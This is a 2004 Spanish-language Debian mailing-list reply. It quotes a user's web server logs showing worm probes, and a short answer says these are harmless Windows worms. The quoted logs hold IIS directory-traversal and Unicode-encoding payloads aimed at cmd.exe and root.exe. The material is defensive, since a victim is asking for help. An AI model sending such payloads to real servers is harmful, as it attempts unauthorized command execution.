[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Ataque al web server

Son los gusanos esos, q atacan a windows. No te calientes. Podes mirar de q
haga log cuando resuelve host nomas .
----- Original Message ----- 
From: "Raúl Hernández" <raulh@ciccp.es>
To: "Lista Debian en español" <debian-user-spanish@lists.debian.org>
Sent: Sunday, February 08, 2004 8:22 AM
Subject: Ataque al web server


> Hola a tod@s,
>
> tengo un servidor web montado con boa (sencillo y eficaz) para poder
> ver la documentación de Debian desde Mozilla con dwww.
>
> Esta máquina también hace de pasarela de mi mini-red local conectando
> por ppp a inet.
>
> Hoy me ha dado por revisar los logs de bos y me encuentro:
>
> 62.147.188.173 - - [25/Jan/2004:01:29:44 +0000] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:47 +0000] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:50 +0000] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:53 +0000] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:55 +0000] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:57 +0000] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:00 +0000] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:02 +0000] "GET
>
62.147.188./msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c
../winnt/system32/cmd.exe?/c+dir
> 62.147.188. HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:05 +0000] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:10 +0000] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:11 +0000] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:12 +0000] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:13 +0000] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:14 +0000] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:16 +0000] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
> "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:18 +0000] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
>
> Naturalmente mis direcciones IP son del tipo 192.168.0.0 por lo que
> esto viene del exterior.
>
> ¿Alguien puede aclarar qué tipo de ataque es y como evitarlo en el
> futuro? Entiendo que no ha tenido éxito, ya que los ficheros referidos
> son WINDOG y no existen en mi sistema.
>
> ¿Es suficiente la directiva Listen 192.168.X.X en /etc/boa/boa.conf
> para evitar estos temas?
>
> También tengo las directivas en /etc/hosts.deny:
> ALL: PARANOID
> ALL: ALL
> y permitiendo solo las direcciones locales en /etc/hosts.allow, por lo
> que no me explico cómo han podido acceder desde inet siendo IPs fuera
> del rango permitido.
>
> Gracias y ...
> -- 
> Un saludo.
> Raúl Hernández <raulh@ciccp.es>
>
>
> -- 
> To UNSUBSCRIBE, email to debian-user-spanish-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact
listmaster@lists.debian.org
>
Reply to: